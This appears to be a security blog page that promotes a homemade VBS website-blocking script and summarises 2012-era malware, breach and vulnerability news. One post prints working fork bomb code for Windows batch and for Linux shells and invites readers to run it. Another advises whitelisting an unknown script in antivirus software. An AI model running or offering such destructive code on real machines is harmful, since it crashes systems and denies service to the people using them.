MyWall-Your own little firewall

A simple, small yet useful utility 
to save your time from unwanted websites.


All of us have one or the other important tasks to complete in the next couple of hours, but most of us usually waste most of our time socializing or hovering here and there over the internet and hence cannot focus on our work because of the turmoils coming from websites like facebook, twitter, youtube, etc.

It would be unfair to crown these sites as time-wasting, however because of the continuous updates, its actually very late when we realize that we have wasted a lot of time... atleast happens with me... :-P

Wondering, we had something that would disable these temporarily without much overhead....?
 
MyWall-Your own little firewall will help you toggle these (if you wish) in just a click

Did i forget to tell... You can also use this as a firewall to block as many sites you wish.
Useful in schools, small offices, even for your kids..

MyWall is a simple script written by me that will just in a click do 
all the overhead required to block and unblock websites in the 
back-end, which is usually a complex task to do.

I made this coz I'm lazy moving to antivirus firewall or the hosts file to 
block/unblock things...

You can Download MyWall from here.

All you have to do is extract the zip to a place.
Just a click will block the unwanted websites 
and clicking it again will unblock them.

PS: You may see a User Access Control warning dialog in Windows Vista or 7 – just say yes.
Don't worry its not a virus...! Its a home-made script... ;)
Also, if the script doesn't execute, whitelist it in your antivirus.
My Kaspersky blocks it...I whitelisted it and it works fine..!

Ya, you must be wondering which sites and how would it block...? 'eh

Yes..! The list is editable.
Just open the MyWall.vbs file (which you would get after extracting) in a text editor.
Notepad as usual. However I recommend Notepad++ as it would make things more clear.
Now edit WebsitesToBlock section (its in the beginning of the script) 
to include/remove any/other website(s) in the banned list. 

My predefined list which you'll already see in the script is:

WebsitesToBlock=Array("twitter.com", "www.youtube.com", "facebook.com")

Simple 'eh... :)

Cheers :)  

Read More

Fork Bombs... Destructive Simplicity

Have you heard of fork bombs...?
If no try this...Experience yourself... ;)

PS: Try this on a VM (Virtual Machine) not on the actual machine

Copy this in a notepad file

-----------copy--here-------------
:fork
start %0
%0|%0
goto :fork
-----------copy--here-------------

save as anything.bat
Execute...!!
Enjoy...! make ur custom bombs... ;)

This is just to demonstrate how small codes can crash a system...
Don't try it on host machines...

For Linux (Fedora, Ubuntu, Redhat, CentOS)
this small piece of code will do the trick...

:(){ :|:& };:

type the above characters in a shell or terminal and press enter...

Don't Misuse....
This is just for knowledge...

Read More

Zeus Variant Targets Cloud-Based Payroll Service

          With critical business services migrating to the cloud, service providers have become a prime target for cybercriminals. In the latest example of financial malware targeting enterprises, we have discovered a Zeus attack that focuses on cloud payroll service providers. These attacks are designed to route funds to criminals, and bypass industrial strength security controls maintained by larger businesses.

          The researchers have captured a Zeus configuration that targets Ceridian, a Canadian human resources and payroll solutions provider. In this attack, Zeus captures a screenshot of a Ceridian payroll services web page (https://clients.powerpay.ca/powerpay/Logon*) when a corporate user whose machine is infected with the Trojan visits this website. This allows Zeus to steal the user id, password, company number and the icon selected by the user for the image-based authentication system.
 
          The financial losses associated with this type of attack can be significant. In August of last year, Cyberthieves reportedly funneled $217,000 from the Metropolitan Entertainment & Convention Authority (MECA). According to published reports an employee at MECA was victimized by a phishing e-mail and infected with malware that stole access credentials to the organization’s payroll system. With valid credentials, the cyberthieves were able to add fictitious employees to the MECA payroll. These money mules, who were hired through work-at-home scams, then received payment transfers from MECA's bank account which they sent to the fraudsters.

          We expect to see increased cybercriminal activity using this type of fraud scheme for the following reasons:
1) Targeting enterprise payroll systems enables attackers to siphon much larger amounts of money than by targeting individual consumers.

2) By stealing the login credentials belonging to enterprise users of these payroll services, fraudsters have everything they need to route payments to money mules before raising any red flags. Using these valid credentials fraudsters can also access personal, corporate and financial data without the need to hack into systems, while leaving very little evidence that malicious access is occurring.

3) By targeting a cloud service provider, the criminals are bypassing tight security mechanisms that are typically employed by medium to large enterprises. In a cloud service provider environment, the enterprise customers who use the service have no control over the vendor’s IT systems and thus little ability to protect their backend financial assets.

4) Cloud services can be accessed using unmanaged devices that are typically less secure and more vulnerable to infection by financial malware (e.g. Zeus)

          Unfortunately, traditional antivirus security mechanisms are largely unable to protect corporate users from becoming infected with Zeus. That’s because attacks like this one are surgical in nature and use targeted reconnaissance combined with signature detection evasion techniques to get a foothold inside corporate computers.

          A better alternative for protecting sensitive cloud payroll, treasury, and other financial applications is to prevent malware from getting onto the endpoint in the first place. This requires a layered approach to security that looks for specific Crime Logic footprints, not signatures, to prevent malware on an infected machine from stealing login credentials.

          For example, Prevent malware from installing on a machine and secure communication between the computer and cloud service provider website to prevent common attack methods like HTML injection keylogging and screen capturing from grabbing data. Protect other web-based applications like VPNs, CRM, and collaboration systems that can be exploited by malware to steal user credentials and breach an enterprise’s security perimeter completely undetected.

Read More

Shocking Statistics From The Latest Internet Threat Report

Anti malware company Symantec released its threat report for 2011 on Monday. The statistics are as follows:-

A.      Religious and ideological sites have triple the average number of threats per infected sites that pornographic Web sites contain.

B.      Top 10 categories of most infected Web sites:

1.       Blogs

2.       Web communications

3.       Religious websites

4.       Personally hosted sites

5.       Business sites

6.       Shopping education

7.       Automative themed sites

8.       Health and medicine sites

9.       Porn sites

C.      3/4 spam messages were pharma themed. ¼ spam messages were Sex and dating-themed.

D.      Spam volumes dropped by around 20 billion messages year over year, to an average of 75% of all e-mail last year, compared with 88.5% in 2010.

E.       U.S. was the top source of every category of malicious activity.

F.       India leads in creation of malware and the use of spam zombies. (I am proud of it.) ;-)

G.     Around 13% of bot activity originated in the U.S. and around 34% of Web based attacks. Close to half of all phishing Web sites were based in the U.S.

H.      China saw a steep drop in malicious activity by about 10%. 

I.        Reports of vulnerabilities in industrial control and SCADA systems rose from 15 in 2010 to 129 in 2011.

Read More

Skype IP address Vulnerability may not be so new

          Skype is warning users following the launch of a site devoted to harvesting user IP addresses.The Skype IP-Finder site allowed third-parties to see a user's last known IP address by simply typing in a user name.

 

          A script has been uploaded to Github that offers these options. According to the page, it can be used to lookup IP addresses of online Skype accounts, and return both the remote and the local IP of that account on a website.

          The script is available. You need to just enter the user name of a Skype user, fill out the captcha, and click the search button to initiate the lookup. You will receive the user’s remote IP and port, as well as the local IP and port.

          Adrian Asher, director of product Security, Skype “We are investigating reports of a new tool that captures a Skype user’s last known IP address. This is an ongoing, industry-wide issue faced by all peer-to-peer software companies. We are committed to the safety and security of our customers and we are takings measures to help protect them.” The proof of concept is fairly simple. All an attacker needs to do is download a special Skype variant and alter a few registry keys to enable debug-log file creation.When adding a Skype contact, before sending the actual request, the victim’s information card can be viewed. At this point, the log file records the user’s IP address.

          The software, posted on Pastebin, works on a patched version of Skype 5.5 and involves adding a few registry keys that allow the attacker to check the IP address of users currently online. Services like Whois will then give some other details on the city, country, internet provider and/or the internal IP-address of the target.

          This particular flaw was discussed in a paper presented by an international team of researchers in November at the Internet Measurement Conference 2011 in Berlin.

          There is currently no way of protecting yourself against the lookup of the IP address, other than not logging in to Skype when the software is not needed. The only other option would be the use of a virtual private network or proxy to hide the IP address from users who look it up.

Read More

Is $10,000 per day from Google Ads less for the Flashback malware Creator?

          In a recent analysis of the business model behind the Flashback Trojan, Symantec security researchers reported that the main objective of the malware is revenue generation through an ad-clicking component. Security researchers at Symantec are estimating that the cyber-crimibals behind the Flashback Mac OS X botnet may have raked in about $10,000 a day.

           Dr. Web, the Russian security firm that firm discovered the massive Flashback botnet last month, has provided new data on the number of Macs still infected with the software. The results show that while close to 460,000 machines remain infected, the botnet is shrinking at a rate of close to a hundred thousand machines a week as Mac users get around to downloading Apple’s tool for disinfecting their machines or installing antivirus.

           When an infected user conducts a Google search, Google will return its normal search results. Flashback waits for someone to click on an ad, and once this happens the user is silently directed to another, irrelevant ad that generates revenue for the attackers. As a result, Google doesn't know someone has clicked into its client's ad, and the client never knows its ad wasn't delivered. Ultimately, Google's advertising clients are paying for Flashback's attackers to host ads on Google.

Story Posted on Symantec’s blog:

          The Flashback ad-clicking component is loaded into Chrome, Firefox, and Safari where it can intercept all GET and POST requests from the browser. Flashback specifically targets search queries made on Google and, depending on the search query, may redirect users to another page of the attacker’s choosing, where they receive revenue from the click . (Google never receives the intended ad click.)

          The ad click component parses out requests resulting from an ad click on Google Search and determines if it is on a whitelist. If not, it forwards the request to a malicious server.

Hackers tricked Mac users into downloading the virus by disguising it as an update to Adobe Flash video viewing software.

Read More

New zero day exploit in Oracle Database

     Oracle has recommended workarounds for a zero-day Oracle Database flaw that was not fixed in the company's April critical patch update. Oracle issued a security alert for Oracle TNS Poison, the vulnerability, disclosed by researcher Joxean Koret after he mistakenly thought it had been fixed by Oracle, allows an attacker to hijack the information exchanged between clients and databases.

Koret originally reported the vulnerability to Oracle in 2008, four years ago! and said he was surprised to see it had been fixed in Oracle’s most recent Critical Patch Update without any acknowledgment of his work.

”This vulnerability is remotely exploitable without authentication, and if successfully exploited, can result in a full compromise of the targeted Database,” the company warned. 

“This security alert addresses the security issue CVE-2012-1675, a vulnerability in the TNS listener which has been recently disclosed as 'TNS Listener Poison Attack' affecting the Oracle Database Server. This vulnerability may be remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password. A remote user can exploit this vulnerability to impact the confidentiality, integrity and availability of systems that do not have recommended solution applied”, Oracle wrote.

A TNS Listener feature known as remote registration dates back to at least 1999 with version 8i of the Oracle Database. By sending a simple query to the service, an attacker can hijack connections legitimate users have already established with the database without the need of a password or other authentication. From then on, data traveling between legitimate users and the server pass through the connection set up by the attacker.

Oracle released a critical update for versions 10g and 11g database products fixing this vulnerability.

Read More

Chinese hacker targeting Indian government and Tibetan activists Sites

        Websites of Indian government and Tibetan activists in the country are under attack in a cyber attack campaign engineered by a Chinese hacker, working with one of the world's largest e-tailers Tencent.

          The cyber criminal in question is Gu Kaiyuan, once a graduate student at a Chinese university that receives government financial support for its computer security program and currently an employee at Chinese portal Tencent. Before Kaiyuan initiated the exploits, collectively called the Luckycat campaign, he was involved in recruiting students for his school’s computer security and defense research.

          The Luckycat cyber campaign, has been linked to 90 attacks in recent past against targets in India and Japan, as well as against Tibetan activists, said the report released by the Japanese network security firm. 'Luckycat' has been able to compromise about 233 computers many of which are in India. A report on the campaign from cloud security company Trend Micro shows that the Luckycat perpetrators began around June 2011.

Also, Trend Micro was able to find a set of campaign codes used to monitor compromised systems. “The campaign codes often contain dates that indicate when each malware attack was launched. This demonstrates how actively and frequently the attackers launched attacks,” the report reads. “The campaign codes also reveal the attackers’ intent, as some of these referenced the intended targets.”

The report did not directly implicate the Chinese government, but security researchers believed that the style of the attacks and the types of targets indicated state-sponsored spying.

Read More

DKFBootKit - First Android BootKit Malware

          NQ Mobile Security Research Center has recently uncovered a new malware DKFBootKit. This malware is identified when monitoring and analyzing the evolution of earlier DroidKungFu variants. What sets DKFBootKit apart from malware like DroidDream, is that DKFBootKit replaces certain boot processes and can begin running even before the system is completely booted up. 

 

         DKFBootKit repackages legitimate apps by enclosing its own malicious payloads in them. However, the victim apps it chooses to infect are utility apps which require the root privilege to work properly. NQ says the malicious code has already infected 1,657 Android devices in the past two weeks and has appeared on at least 50 different mobile apps.

 

           These apps seem to have legitimate reasons to request root privilege for their own functionality. It is also reasonable to believe that users will likely grant the root privilege to these apps. DKFBootKit makes use of the granted root privilege for other malicious purposes, namely comprising the system integrity.

In order to avoid being infected by this beast, NQ recommends three commonsense steps: 

• First, don't download any apps from sketchy app stores.
• Second, don't accept app permissions from unknown sources and always be sure to read the permissions an app is requesting.
• Third, download a security app that can scan your apps for you to search for malicious code.

NQ Mobile Security for Android is available for download.

Read More

50K Cards Compromised using Credit Card Processor

          Some 50,000 credit and debit cardholders may have their information exposed following a security breach at Global Payments. The breach occurred sometime between between Jan. 21, 2012 and Feb. 25, 2012.

          Both Visa and MasterCard have confirmed they have warned U.S. banks that a credit card processor was reportedly breached. Both firms say their own security systems were not compromised. MasterCard said law enforcement has been notified of the matter and an "independent data security organization" is conducting a forensic review of the matter. "MasterCard's own systems have not been compromised in any manner," a company spokesman said in a statement. The company will "continue to both monitor this event and take steps to safeguard account information."

           Because it sits in this middle ground directing where payment information goes, an attack on its system would leave a lot of private financial data exposed. Alerts sent out to U.S. banks late last week advised them that certain cards may have been compromised.

          "While the scope and details of the attack are not yet known, it shows that three years after the Heartland Payment Systems breach of 130 million credit card numbers, credit card data is still vulnerable," Roiter said.

Read More

Kelihos Botnet with 110,000 PCs take down finally

       Botnets are particularly insidious, using thousands of virus-infected computers which their owners are unaware are being used for sending out spam, launching denial-of-service attacks and stealing data. But taking down a botnet poses challenges. The main problem is that legitimate security companies can’t use the same type of weapons as criminals.

          A group of malware experts from security companies Kaspersky Lab, CrowdStrike, Dell SecureWorks and the Honeynet Project, have worked together to disable the second version of the Kelihos botnet, which is significantly bigger than the one shut down by Microsoft and its partners.

          Kelihos is used to send spam, carry out DDoS attacks, and steal online currency such as bitcoin wallets. It operates as a so-called "peer-to-peer" bot network, which are more difficult to take down than those with a centralized command and control servers (C&C), according to Tillmann Werner, a senior researcher at CrowdStrike.

          Seculert reports that Kelihos-B, which was distributed as a Facebook worm over recent weeks, is still active and spreading - even after the shutdown attempt by CrowdStrike and Kaspersky Labs this week. The peer-to-peer Kelihos botnet, also known as Hlux, was sucked into a 'sinkhole' by a small group of security experts from Kaspersky Lab, Dell SecureWorks, CrowdStrike Intelligence Team and the Honeynet Project.

          It's unclear who is behind Kelihos, he said. It was created last October after Microsoft used a sinkhole to halt the original Kelihos botnet, which had infected about 41,000 computers. The latest Kelihos used servers with hosts registered in Sweden, Russia and Ukraine that were controlled by a botmaster, according to CrowdStrike.

     The machines are still infected, and the researchers are relying on ISPs to inform affected users. What is to say this botnet won’t just morph itself again? “That is a possibility,” said Crowdstrike’s Mr. Meyers. “But when that happens, we’ll be there to take it back down.”

Read More

A Russian Zeus attacker Sentenced from Million Dollar Fraud

 

       A Russian Hacker, who was part of an elaborate Cyber attack that used Zeus Banking Trojan in U.S. visas to move cash stolen from U.S. businesses out of the country was sentenced on March 23 to two years in U.S. federal prison.

        Nikokay Garifulin received a two-year prison term for his involvement in a global bank fraud scheme that used hundreds of phone bank accounts to steal over $3 million from dozens of U.S.accounts that were compromised by malware attacks.

 

           According to court documents and statements, Garifulin was part of a cyber bank fraud scheme, backed by Eastern European hackers to steal money from the bank accounts of small and mid-sized businesses throughout the U.S. The cyber attacks included Zeus Trojan, would embed itself in victims’ computers and record keystrokes as they logged into their online bank accounts.

          The hackers responsible for the malware then used the account information to take over the victims’ bank accounts and make unauthorized transfers of thousands of dollars at a time to accounts controlled by co-conspirators, including Garifulin, who were members of a money mule organization.

         Garifulin collected money that had been withdrawn by mules from the phony accounts in the United States and, under the direction of the organization’s leader, distributed it to other co-conspirators and transported it back to Eastern Europe. GARIFULIN also arranged for fake passports to be transferred from Eastern Europe to mules in the United States.

         In addition to his prison term, Garifulin, 23, of Volgograd, Russia, was sentenced to three years of supervised release. He was also ordered to forfeit $100,000 and to pay $192,123,122 in restitution.

Read More

Japan orders Google to remove auto-complete function over privacy complaint

          Google has been ordered to disable part of its autocomplete function in Japan after complaints it violates privacy. According to a report by The Japan Times, the court was acting on a petition accusing Google’s autocomplete feature of being defamatory.

          The petition was filed by a Japanese man (name not disclosed) who alleged that some of the autocomplete suggestions accompanying his name were not only defamatory but also breached his privacy. The unnamed petitioner, in fact, claimed that these defamatory search suggestions even cost him his job. The man came to this conclusion after discovering that when people type his name into Google's search engine, words suggesting criminal acts, which he is unfamiliar with, automatically appear. If a computer-suggested term is selected, more than 10,000 items defaming or disparaging him show up in a list, Tomita said.

          Google has so far not carried out the court's request - but said it was "reviewing the order". "A Japanese court issued a provisional order requesting Google to delete specific terms from autocomplete," the Google spokesperson said in a statement. "The judge did not require Google to completely suspend the autocomplete function."

           Google defended the system, arguing that as results were generated mechanically - rather than by an individual it was not an invasion of privacy." These searches are produced by a number of factors including the popularity of search terms," the company said.

          Google has been having a few problems with these sorts of cases. Last year when a British man was falsely accused of being a paedophile in a Google Places review the company had to pull it. The search engine also had to give in to an Indian law directing internet companies to block religiously offensive information from searches.

Read More

Return of Lulzsec, Dump 170937 accounts from Military Dating Site

        Another Hacking group after Lulzsec, comes with name LulzsecReborn has posted names, usernames, passwords, and emails of 170,937 accounts on MilitarySingles.com on Pastebin as part of the group’s Operation Digiturk. LulzSec was a major ticket item last year as the group hacked a number of high profile Web sites all in the name of the “lulz.” After their so called “50 Day Cruise,” the group broke up and went their separate ways.Hacker claim that, There are emails such as @us.army.mil ; @carney.navy.mil ; @greatlakes.cnet.navy.mil ; @microsoft.com ; etc.. in dump.

 

         In response to a query by the Office of Inadequate Security, ESingles, the parent company of MilitarySingles.com, said that there is “no actual evidence that MilitarySingles.com was hacked and it is possible that the Tweet from Operation Digiturk is simply a false claim.”. LulzSecReborn hack the site and added his deface page here, (as shown in above page) and replied “Stupid Administrator: ‘There is no evidence MilitarySingles is hacked’. Well guess what?”Commenting on the breach, the Office of Inadequate Security said: “If you know a member of the military who uses or has used the site, do them a favor and suggest they change their password on any site where they may have reused it – including their mil.gov email account.”

          In a video posted to YouTube last weekend and titled LulzSec Returns, the group says it decided to "bring back our humble hacking group and set sail towards the interwebs again". Referring to the arrests, it said these had "merely disrupted the active faction".

Read More

Facebook profiles can be hijacked by Chrome extensions malware

          Cybercriminals are uploading malicious Chrome browser extensions to the official Chrome Web Store and use them to hijack Facebook accounts, according to security researchers from Kaspersky Lab. The rogue extensions are advertised on Facebook by scammers and claim to allow changing the color of profile pages, tracking profile visitors or even removing social media viruses.

 

          The attacks manifest as suggestions to download Facebook apps. Those apps are, alas, not real. Instead they are malware and, in one case, a malware-laden Chrome extension hosted in Google's very own Chrome Web Store. To do that, they must follow a series of steps, which include installing a fake Adobe Flash Player Chrome extension. The launchpad for the fake Flash Player is a Facebook app called “Aprenda”. If Aprenda is installed it redirects users to Chrome Web Store, encouraging them to install the fake Flash extension.

          “This last one caught our attention not because it asks the user to install a malicious extension, but because the malicious extension is hosted at the official Google's Chrome Web Store. If the user clicks on ‘install application’ he will be redirected to the official store. The malicious extension presents itself as “Adobe Flash Player”, wrote Fabio Assolini. "Be careful when using Facebook. And think twice before installing a Google Chrome extension," he adds.

          Uploading multiple rogue extensions on the Chrome Web Store and running several Facebook spam campaigns to advertise them allows attackers to quickly compromise thousands of accounts. The malware operates in much the same way as other Facebook scams, such as inviting friends to install it, however the purpose of the highjacking accounts is to generate fraudulent "Likes" which are sold for about US$27 per 1,000.

          Now, the extension Assolini found was concentrated in Brazil, where Chrome enjoys 45% of the browser market and Facebook is by far the most popular social network. That does not, however, mean that the problem is isolated to Brazil. The malicious extension was installed in numerous countries, including the U.S. With these potential security risks in mind, "Think twice before installing a Google Chrome extension".

Read More

Facebook Profile Viewer rogue application spreads on social network

          A rogue application which claims to allow you to see who has viewed your Facebook profile is spreading between accounts on the popular social network. Messages claiming that Facebook has issued a new update which allows you to check who has visited your profile are making the rounds.

New Update from facebook. Now you can check who visited your profile. check here -------->>>FAŒBOOK PROFILE VIEWER ®<<<<------
Who Watching your Profile ?

          If you are intrigued by the Facebook Profile Viewer enough to click on the link, you are asked to permit an application to access your profile. You should always be very careful, of course, about allowing applications to read and write to your

          Facebook profile. And this time is no exception. Because although at first you may believe that the application is showing you the details of people who have viewed your profile..

..behind the scenes, it is posting a message to your Facebook page without your explicit permission, encouraging others to also use the application.

          Clearly rogue applications like this could be used for scooping up personal information, or spreading spam and scams across the social network. So if you fell for it, remove the messages from your timeline, revoke the app's publishing rights and report it as spam to Facebook, and ensure that you have revoked its access to your account.

And remember this - Facebook does not give you any way to find out who has been viewing your profile. Any application or link which claims it can reveal to you who has should be treated with great suspicion.

Read More

Breaching Hundreds of KPN Servers

          Dutch Police Arrest 17-year-old Suspected of The Dutch High Tech Crime Team has arrested a 17-year-old suspected of compromising customer account data on hundreds of servers belonging to telecommunications operator KPN. The teenager was arrested last Tuesday in the Dutch town of Barendrecht, where police seized an encrypted computer, two laptops and other storage media including external hard drives, DVDs and USB sticks, the Dutch Public Prosecution Service announced on Monday.

          "He has made a confession," said Wim de Bruin, spokesman for the Public Prosecution Service.
The arrested teenager called himself "xS", "Yoshioka" and "Yui" online, and is suspected of breaching the security of hundreds of KPN servers last January, compromising user data and damaging KPN's infrastructure, said the Prosecution Service.

          KPN, the biggest telecom operator in the Netherlands, was forced to overhaul its systems to get rid of installed malicious software after the hack was discovered. The National Cyber Security Center of the Netherlands also assessed the security breach and concluded that national security was not compromised.In the wake of the hack, KPN suspended access to 2 million email accounts and asked users to change their passwords, after account details of KPN customers were leaked on Pastebin in early February. The KPN data that appeared online was filtered from the captured database.

          The arrested teenager was followed online for weeks and the Dutch police collaborated closely with the Cyber Terror Response Center in South Korea and the Australian Federal Police, according to the Prosecution Service. A person using the aliases "Yui", "Yoshiaka' and "xS", appeared to have bragged about the KPN hack in a chat channel for students at the Korea Advanced Institute of Science and Technology (KAIST), the prosecution said.

          Besides hacking KPN the 17-year-old is also suspected of hacking computers at KAIST and at Trondheim University in Norway, and of breaching the security of Tokohu University in Japan. He is also thought to have been running a website used for selling stolen credit card data, according to the prosecution.
According to De Bruin the teenager did not confess to the other allegations. "Those are still being investigated," he said.

          After the teenager's arrest, a judge ruled that he was to be kept in custody for at least two weeks. After that period, the Prosecution Service will assess if he has to be kept in custody, or can be freed until his trial. The suspect has legal support from a solicitor and was visited by the Dutch council for child protection, said the Prosecution Service. According to De Bruin, the maximum penalty the teenager faces is two years in prison. The maximum penalty is reduced due to his age. "For an adult the maximum penalty would be six years imprisonment," De Bruin said.

           In the wake of the hacking, KPN said last week it will appoint a Chief Security Officer (CSO), and later this year will set up a permanent control center to monitor its systems. The company has replaced the compromised systems and will spend months checking the security of all its other systems.

Read More

Justin Bieber's Twitter account - hacked!

          Lend a little sympathy to pop star Justin Bieber today, after his Twitter account was hacked and an unauthorised message was sent to his 19 million fans.

19 million my ass. #biebermyballs

          Fortunately the message was rapidly deleted, and it appears that the account was compromised more to spread embarrassing graffiti rather than with more malicious intention. Just imagine how much worse things would have been if millions of Justin Bieber fans had seen a tweet from their hero offering, say, free concert tickets - and the link had really pointed to a website designed to strike their computers with malware.
That's not to say that the hacker didn't do any serious damage at all, of course. According to reports whoever broke into Justin Bieber's Twitter account, also began to unfollow and block some of the folks that the Canadian singer follows.

          If you're one of Justin Bieber's many fans, please learn something from your idol's misfortune. Always choose a strong, secure password for your Twitter account and make sure that you are not using it on any other websites, and never share it with anyone else.

          Furthermore, be careful that you only log into your Twitter account from a computer that is properly protected with up-to-date anti-virus software and security patches - in other words, maybe you shouldn't trust that computer in a hotel lobby or your friend's PC. Keylogging spyware can grab your password without you knowing, and pass it onto malicious hackers.
And remember that just because a Twitter account is "verified", doesn't necessarily mean you can trust every message that is posted to it.

Read More

User IDs and Clear-Text Passwords Leaked from US Army’s CECOM

          Black Jester, the hacker who yesterday demonstrated that he managed to gain unauthorized access to a NASA site, leaked sensitive contract information from a site connected to the US Army Communications and Electronics Command (CECOM).

           A number of 30 record sets that include names, user IDs, physical addresses, email addresses, telephone numbers, and clear-text passwords were published in a Pastebin document. “Old crappy server, but has good info inside it. The list is not complete due the lazy condition and msaccess db , enjoy!” the hacker wrote next to the data dump.

           The Pastebin post doesn’t contain the name of the site from where the data was leaked, but the hacker provided us with the IP address associated with it. That IP address led us to a Software Engineering Services site on which only “eligible users” may register.

           We couldn’t reach the hacker for further comment, but he told us on a different occasion that the names of such sites would not be disclosed to the public to prevent “script kiddiez” from breaching them.
We have sent an email to the webmaster of the site in question and notified him on the incident, but so far we haven’t received any response.

           Black Jester is known in the hacker community as the one who wanted to help the United Nations patch up a couple of its public websites. Instead of doing what most security researchers do in this situation and send an email, he went down to their offices in person.

           His other hacks, which he claims are unrelated to the UN incident, targeted NASA and a Qwest datacenter, whose servers he held hostage with the purpose of forcing the company to patch up the vulnerabilities.

Read More

Carberp Banking Trojan Scam - 8 Arrested in Russia

     8 Men suspected of being involved in the Carberp phishing scam have been arrested in Russia. The men were arrested after a joint investigation by the Russian Ministry of Internal Affairs (MVD) and Federal Security Service (FSB).

    According to the MVD, the investigation found that two brothers were the ringleaders of the gang, and developed a plan to steal money from the accounts of online banking customers. The eight suspects allegedly stole more than 60 million Rubles ($2 million) from 90 victims using the Carberp Trojan.

     Russian security firm who assisted with the investigation, pegged the stolen loot at 130 million Rubles ($4.5 million). Police confiscated computers, bank cards, notary equipment, fake documentation, and more than 7 million Rubles ($240,000) in cash during the raid.

     The gang used the Carberp and RDP-door Trojans to snare victims. Carberp is a well-known Trojan that was recently seen on Facebook as part of a scam where attackers notify Facebook users that their accounts are temporarily locked. All they had to do to get them back was provide their first and last names, email addresses, dates of birth, passwords, and a 20-euro Ukash voucher.

     The suspects will be accused of creating, using and disseminating of harmful computer programs, theft and illegal access to computer information and, if convicted, could be jailed for up to 10 years. In addition to bank fraud, the gang was also involved in distributed denial-of-service attacks, the security firm found.

Read More

Mystery of Duqu Programming Language Solved

       An appeal for help from the programming community has allowed antivirus analysts to classify the unknown language used to develop key components of the Duqu Trojan. The sections responsible for downloading and executing additional modules in the Duqu Trojan, referred to by some as Stuxnet 2.0, were written in standard C++.

 

          Kaspersky Lab experts now say with a high degree of certainty that the Duqu framework was written using a custom object-oriented extension to C, generally called “OO C” and compiled with Microsoft Visual Studio Compiler 2008 (MSVC 2008) with special options for optimizing code size and inline expansion.

       Kaspersky’s Igor Soumenkov wrote, “No matter which of these two variants is true, the implications are impressive. The Payload DLL contains 95 Kbytes of event-driven code written with OO C, a language that has no automatic memory management or safe pointers,”.

Kaspersky’s analysis now concludes:

• The Duqu Framework consists of “C” code compiled with MSVC 2008 using the special options “/O1″ and “/Ob1″
• The code was most likely written with a custom extension to C, generally called “OO C”
• The event-driven architecture was developed as a part of the Duqu Framework or its OO C extension
• The C&C code could have been reused from an already existing software project and integrated into the Duqu Trojan

      The Duqu Framework may have been created by a different programming team, since it is unique to Duqu, unlike many parts of Duqu that seem to be directly borrowed from Stuxnet. It’s believed that the developers are old school that don’t trust C++ and that’s probably why they relied on C. Another reason for using OO C is because back in the good old days it was more portable than C++. 

           Knowing the techniques used to develop the malware allows Kaspersky's researchers to make better guesses about who might be behind the code. Creating Duqu was a major project, so it’s possible that an entirely different team was responsible for creating the Duqu Framework, while others worked on creating drivers and system infection exploits. In this scenario it's even possible that those who created the Duqu framework were ignorant of the real purpose of their work.

          Duqu was first detected in September 2011, but Kaspersky Lab believes it has seen the first pieces of Duqu-related malware dating back to August 2007. The Russian security firm also notes Duqu, like Stuxnet before it, is highly targeted and related to Iran’s nuclear program.

Read More

The Pirate Bay plans Low Orbit Server Drones to beat Censorship

          One of the world’s largest BitTorrent sites “The Pirate Bay” is going to put servers on GPS-controlled aircraft drones in order to evade authorities who are looking to shut the site down. In a Sunday blog post, The Pirate Bay announced new “Low Orbit Server Stations” that will house the site’s servers and files on unmanned, GPS-controlled, aircraft drones.

TPB said:

          With the development of GPS controlled drones, far-reaching cheap radio equipment and tiny new computers like the Raspberry Pi, we’re going to experiment with sending out some small drones that will float some kilometers up in the air. This way our machines will have to be shut down with aeroplanes in order to shut down the system. A real act of war.

 

          We’re just starting so we haven’t figured everything out yet. But we can’t limit ourselves to hosting things just on land anymore. These Low Orbit Server Stations (LOSS) are just the first attempt. With modern radio transmitters we can get over 100Mbps per node up to 50km away. For the proxy system we’re building, that’s more than enough. Low earth orbit is 100 miles up and requires a launch vehicle capable of achieving speeds of 17,000 miles an hour. At “some kilometers up in the air,” these drones would require significant power to stay afloat, and that’s even before the power required to transmit megabits per second over a wireless connection. The LOSS are already in development, writes the blog from TPB. 

 

          As you might wish to solve the energy problem, you have not thought about it well. And that will probably be the weak point. In the air it is hardly the drones now at least can fill up with energy. You will need to load them somewhere where they will be charged. By then, the authorities can access and turn off the drones easily

Read More